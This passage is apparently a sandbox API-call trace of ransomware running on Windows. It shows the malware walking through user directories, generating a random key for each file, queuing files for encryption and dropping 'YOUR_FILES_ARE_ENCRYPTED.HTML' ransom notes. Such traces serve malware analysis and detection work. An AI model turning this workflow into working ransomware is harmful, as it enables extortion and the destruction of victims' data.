ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcbe3640, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a11ed0d, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.336] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcbe3640, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcbe3640, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8ad9e0a4, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x2f9d, dwReserved0=0x0, dwReserved1=0x60, cFileName="brndlog.txt", cAlternateFileName="")) 
returned 1 [0170.336] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt") returned 74 [0170.336] lstrcmpW (lpString1="brndlog.txt", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.336] PathFindExtensionW (pszPath="brndlog.txt") returned=".txt" [0170.336] lstrlenW (lpString=".txt") returned 4 [0170.336] PathFindExtensionW (pszPath="brndlog.txt") returned=".txt" [0170.336] SystemFunction036 (in: RandomBuffer=0x4ebd4e0, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd4e0) returned 1 [0170.336] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\internet explorer\\brndlog.txt"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5cc [0170.338] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x4ebd504 | out: lpFileSize=0x4ebd504*=12189) returned 1 [0170.338] GetProcessHeap () returned 0x270000 [0170.338] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x73e0048 [0170.341] wsprintfW (in: param_1=0x4ebd41e, param_2="%02X" | out: param_1="08") returned 2 [0170.341] wsprintfW (in: param_1=0x4ebd422, param_2="%02X" | out: param_1="4E") returned 2 [0170.341] wsprintfW (in: param_1=0x4ebd426, param_2="%02X" | out: param_1="C9") returned 2 [0170.341] wsprintfW (in: param_1=0x4ebd42a, param_2="%02X" | out: param_1="DD") returned 2 [0170.341] wsprintfW (in: param_1=0x4ebd42e, param_2="%02X" | out: param_1="8C") returned 2 [0170.341] wsprintfW (in: param_1=0x4ebd432, param_2="%02X" | out: param_1="F7") returned 2 [0170.341] wsprintfW (in: param_1=0x4ebd436, param_2="%02X" | out: param_1="17") returned 2 [0170.341] wsprintfW (in: param_1=0x4ebd43a, param_2="%02X" | out: param_1="B8") returned 2 [0170.341] 
wsprintfW (in: param_1=0x4ebd43e, param_2="%02X" | out: param_1="E1") returned 2 [0170.341] wsprintfW (in: param_1=0x4ebd442, param_2="%02X" | out: param_1="6F") returned 2 [0170.341] wsprintfW (in: param_1=0x4ebd446, param_2="%02X" | out: param_1="87") returned 2 [0170.341] wsprintfW (in: param_1=0x4ebd44a, param_2="%02X" | out: param_1="A7") returned 2 [0170.341] wsprintfW (in: param_1=0x4ebd44e, param_2="%02X" | out: param_1="E5") returned 2 [0170.341] wsprintfW (in: param_1=0x4ebd452, param_2="%02X" | out: param_1="B6") returned 2 [0170.341] wsprintfW (in: param_1=0x4ebd456, param_2="%02X" | out: param_1="55") returned 2 [0170.341] wsprintfW (in: param_1=0x4ebd45a, param_2="%02X" | out: param_1="2D") returned 2 [0170.341] wsprintfW (in: param_1=0x4ebd45e, param_2="%02X" | out: param_1="E0") returned 2 [0170.341] wsprintfW (in: param_1=0x4ebd462, param_2="%02X" | out: param_1="09") returned 2 [0170.341] wsprintfW (in: param_1=0x4ebd466, param_2="%02X" | out: param_1="84") returned 2 [0170.341] wsprintfW (in: param_1=0x4ebd46a, param_2="%02X" | out: param_1="D2") returned 2 [0170.341] wsprintfW (in: param_1=0x4ebd46e, param_2="%02X" | out: param_1="75") returned 2 [0170.342] wsprintfW (in: param_1=0x4ebd472, param_2="%02X" | out: param_1="64") returned 2 [0170.342] wsprintfW (in: param_1=0x4ebd476, param_2="%02X" | out: param_1="57") returned 2 [0170.342] wsprintfW (in: param_1=0x4ebd47a, param_2="%02X" | out: param_1="79") returned 2 [0170.342] wsprintfW (in: param_1=0x4ebd47e, param_2="%02X" | out: param_1="CD") returned 2 [0170.342] wsprintfW (in: param_1=0x4ebd482, param_2="%02X" | out: param_1="E8") returned 2 [0170.342] wsprintfW (in: param_1=0x4ebd486, param_2="%02X" | out: param_1="22") returned 2 [0170.342] wsprintfW (in: param_1=0x4ebd48a, param_2="%02X" | out: param_1="67") returned 2 [0170.342] wsprintfW (in: param_1=0x4ebd48e, param_2="%02X" | out: param_1="59") returned 2 [0170.342] wsprintfW (in: param_1=0x4ebd492, param_2="%02X" | out: 
param_1="91") returned 2 [0170.342] wsprintfW (in: param_1=0x4ebd496, param_2="%02X" | out: param_1="49") returned 2 [0170.342] wsprintfW (in: param_1=0x4ebd49a, param_2="%02X" | out: param_1="0B") returned 2 [0170.342] lstrcpyW (in: lpString1=0x73f00fc, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt" [0170.342] CreateIoCompletionPort (FileHandle=0x5cc, ExistingCompletionPort=0x3a0, CompletionKey=0x73e0048, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0170.342] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x73e0048, lpOverlapped=0x73e0048) returned 1 [0170.343] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcbe3640, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcbe3640, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8ad9e0a4, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x2f9d, dwReserved0=0x0, dwReserved1=0x60, cFileName="brndlog.txt", cAlternateFileName="")) returned 0 [0170.343] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0170.343] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 92 [0170.343] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\internet explorer\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, 
lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5fc [0170.343] WriteFile (in: hFile=0x5fc, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0170.346] CloseHandle (hObject=0x5fc) returned 1 [0170.346] GetProcessHeap () returned 0x270000 [0170.347] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7759008 | out: hHeap=0x270000) returned 1 [0170.348] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcbe3640, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4a8be66, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xff373816, dwReserved1=0xffffffff, cFileName="Media Player", cAlternateFileName="MEDIAP~1")) returned 1 [0170.348] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player") returned 57 [0170.348] GetProcessHeap () returned 0x270000 [0170.348] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74081a0 [0170.348] lstrcpyW (in: lpString1=0x74081a0, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player" [0170.348] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\*" 
[0170.348] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcbe3640, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4a8be66, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0170.360] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcbe3640, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4a8be66, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.360] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcbbd4e0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcbbd4e0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4b96808, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x105000, dwReserved0=0x0, dwReserved1=0x60, cFileName="CurrentDatabase_372.wmdb", cAlternateFileName="CURREN~1.WMD")) returned 1 [0170.360] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\CurrentDatabase_372.wmdb") returned 82 [0170.360] lstrcmpW (lpString1="CurrentDatabase_372.wmdb", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.360] PathFindExtensionW 
(pszPath="CurrentDatabase_372.wmdb") returned=".wmdb" [0170.360] lstrlenW (lpString=".wmdb") returned 5 [0170.360] PathFindExtensionW (pszPath="CurrentDatabase_372.wmdb") returned=".wmdb" [0170.360] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcbbd4e0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcbbd4e0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4a8be66, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x109a0, dwReserved0=0x0, dwReserved1=0x60, cFileName="LocalMLS_3.wmdb", cAlternateFileName="LOCALM~1.WMD")) returned 1 [0170.360] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\LocalMLS_3.wmdb") returned 73 [0170.360] lstrcmpW (lpString1="LocalMLS_3.wmdb", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.360] PathFindExtensionW (pszPath="LocalMLS_3.wmdb") returned=".wmdb" [0170.360] lstrlenW (lpString=".wmdb") returned 5 [0170.360] PathFindExtensionW (pszPath="LocalMLS_3.wmdb") returned=".wmdb" [0170.360] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8657653f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Sync Playlists", cAlternateFileName="SYNCPL~1")) returned 1 [0170.360] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists") returned 72 [0170.360] GetProcessHeap () returned 0x270000 
[0170.360] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7759008 [0170.360] lstrcpyW (in: lpString1=0x7759008, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists" [0170.360] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\*" [0170.361] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8657653f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0170.361] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8657653f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.361] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: 
lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8657653f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="en-US", cAlternateFileName="")) returned 1 [0170.361] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US") returned 78 [0170.361] GetProcessHeap () returned 0x270000 [0170.361] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7769010 [0170.361] lstrcpyW (in: lpString1=0x7769010, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US" [0170.361] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\*" [0170.361] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8657653f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, 
dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0170.361] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8657653f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.361] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcbbd4e0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8659c69f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="0000FDBE", cAlternateFileName="")) returned 1 [0170.361] wnsprintfW (in: pszDest=0x7769010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000FDBE") returned 87 [0170.362] GetProcessHeap () returned 0x270000 [0170.362] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x78c1008 [0170.379] lstrcpyW (in: lpString1=0x78c1008, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000FDBE" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000FDBE") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000FDBE" [0170.379] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000FDBE", 
lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000FDBE\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000FDBE\\*" [0170.379] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000FDBE\\*", lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcbbd4e0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8659c69f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f32c0 [0170.539] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcbbd4e0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8659c69f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.539] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcbbd4e0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcbbd4e0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8657653f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x414, dwReserved0=0x0, dwReserved1=0x60, cFileName="01_Music_auto_rated_at_5_stars.wpl", cAlternateFileName="01_MUS~1.WPL")) returned 1 [0170.539] wnsprintfW (in: pszDest=0x78c1008, cchDest=32768, 
pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000FDBE\\01_Music_auto_rated_at_5_stars.wpl") returned 122 [0170.539] lstrcmpW (lpString1="01_Music_auto_rated_at_5_stars.wpl", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.540] PathFindExtensionW (pszPath="01_Music_auto_rated_at_5_stars.wpl") returned=".wpl" [0170.540] lstrlenW (lpString=".wpl") returned 4 [0170.540] PathFindExtensionW (pszPath="01_Music_auto_rated_at_5_stars.wpl") returned=".wpl" [0170.540] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcbbd4e0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcbbd4e0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8657653f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x4ff, dwReserved0=0x0, dwReserved1=0x60, cFileName="02_Music_added_in_the_last_month.wpl", cAlternateFileName="02_MUS~1.WPL")) returned 1 [0170.540] wnsprintfW (in: pszDest=0x78c1008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000FDBE\\02_Music_added_in_the_last_month.wpl") returned 124 [0170.540] lstrcmpW (lpString1="02_Music_added_in_the_last_month.wpl", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.540] PathFindExtensionW (pszPath="02_Music_added_in_the_last_month.wpl") returned=".wpl" [0170.540] lstrlenW (lpString=".wpl") returned 4 [0170.540] PathFindExtensionW (pszPath="02_Music_added_in_the_last_month.wpl") returned=".wpl" [0170.540] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcbbd4e0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcbbd4e0, 
ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8659c69f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x4f3, dwReserved0=0x0, dwReserved1=0x60, cFileName="03_Music_rated_at_4_or_5_stars.wpl", cAlternateFileName="03_MUS~1.WPL")) returned 1 [0170.540] wnsprintfW (in: pszDest=0x78c1008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000FDBE\\03_Music_rated_at_4_or_5_stars.wpl") returned 122 [0170.540] lstrcmpW (lpString1="03_Music_rated_at_4_or_5_stars.wpl", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.540] PathFindExtensionW (pszPath="03_Music_rated_at_4_or_5_stars.wpl") returned=".wpl" [0170.540] lstrlenW (lpString=".wpl") returned 4 [0170.540] PathFindExtensionW (pszPath="03_Music_rated_at_4_or_5_stars.wpl") returned=".wpl" [0170.540] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcbbd4e0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcbbd4e0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8659c69f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x504, dwReserved0=0x0, dwReserved1=0x60, cFileName="04_Music_played_in_the_last_month.wpl", cAlternateFileName="04_MUS~1.WPL")) returned 1 [0170.540] wnsprintfW (in: pszDest=0x78c1008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000FDBE\\04_Music_played_in_the_last_month.wpl") returned 125 [0170.540] lstrcmpW (lpString1="04_Music_played_in_the_last_month.wpl", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.540] PathFindExtensionW (pszPath="04_Music_played_in_the_last_month.wpl") returned=".wpl" [0170.540] lstrlenW (lpString=".wpl") returned 4 [0170.540] 
